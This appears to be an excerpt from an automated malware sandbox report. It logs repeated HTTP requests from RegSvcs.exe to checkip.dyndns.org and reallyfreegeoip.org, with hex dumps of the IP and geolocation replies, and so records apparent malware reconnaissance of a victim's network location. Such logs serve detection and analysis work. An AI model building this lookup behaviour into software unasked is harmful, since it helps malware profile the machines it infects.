Jan 10, 2025 18:46:34.705295086 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 18:46:34.893802881 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:34 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Jan 10, 2025 18:46:35.925177097 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 18:46:36.113127947 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:36 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 1 | Source IP: 192.168.2.4 | Source Port: 49733 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 3328 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:46:36.774924994 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 18:46:37.418919086 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:37 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49735 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 3328 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:46:38.055321932 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 18:46:38.733916998 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:38 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49737 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 3328 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:46:39.391823053 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 18:46:40.040877104 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:39 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49739 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 3328 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:46:40.692640066 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 18:46:41.341200113 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:41 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49741 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 3328 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:46:42.005754948 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 18:46:42.667922974 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:42 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49743 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 3328 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:46:43.424245119 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 18:46:44.079435110 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:43 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49747 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 3328 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:46:44.693042994 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 18:46:45.348901987 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:45 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49754 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 4048 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:46:49.354959965 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 18:46:50.091666937 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:50 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 18:46:50.095407963 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 18:46:50.286128044 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:50 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 18:46:51.012773037 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 18:46:51.227150917 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:51 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49757 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 4048 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:46:51.878251076 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 18:46:52.652055979 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:52 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49760 | 193.122.6.168 | 80 | 4048 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:46:53.622620106 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 18:46:54.263209105 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 17:46:54 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49762 | 193.122.6.168 | 80 | 4048 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:46:55.004106998 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 18:46:55.670500994 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 17:46:55 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49764 | 193.122.6.168 | 80 | 4048 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:46:56.331399918 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 18:46:56.980945110 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 17:46:56 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49766 | 193.122.6.168 | 80 | 4048 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:46:57.610989094 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 18:46:58.275707960 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 17:46:58 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49768 | 193.122.6.168 | 80 | 4048 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:46:58.937040091 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 18:46:59.748574018 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 17:46:59 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49770 | 193.122.6.168 | 80 | 4048 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:47:00.427499056 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 10, 2025 18:47:01.063929081 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 17:47:00 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 104.21.64.14 | 443 | 3328 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 17:46:35 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 17:46:35 UTC | 861 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 17:46:35 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1845984
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x69B9p35gcXjmg%2F6PgYAY%2BPDI5nvLhxbaZi8Es7oY6MQ8SBv%2BUF0cZGfzYEVTN4dNLAYjzWm%2FejyBVdhba%2FYcC6SVK9LGNgyDjutGn%2BRyCgXr8tgOyG4ttkyopYYPucCI4JpxrTf"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffe7cc5ecb3c358-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1616&rtt_var=625&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1725768&cwnd=155&unsent_bytes=0&cid=1bcddfabbab7d8ad&ts=225&x=0"
2025-01-10 17:46:35 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 104.21.64.14 | 443 | 3328 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 17:46:36 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-10 17:46:36 UTC | 857 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 17:46:36 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1845985
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QBZ%2FMZsEgwiAP8jBgqcqgVwiSE3EtpElVYsptYoZKioeOnl1n0wb%2Buvpm6B0%2FRXtghHKoonYFW9MRrLQImCcAITonWJQ65EiVEhB9Hjf%2BcTYU60MEWmWUboYar8uUhjmgjB4OXga"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffe7ccb5dee42e9-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1760&min_rtt=1759&rtt_var=662&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1651583&cwnd=240&unsent_bytes=0&cid=3005a3016afd0cde&ts=163&x=0"
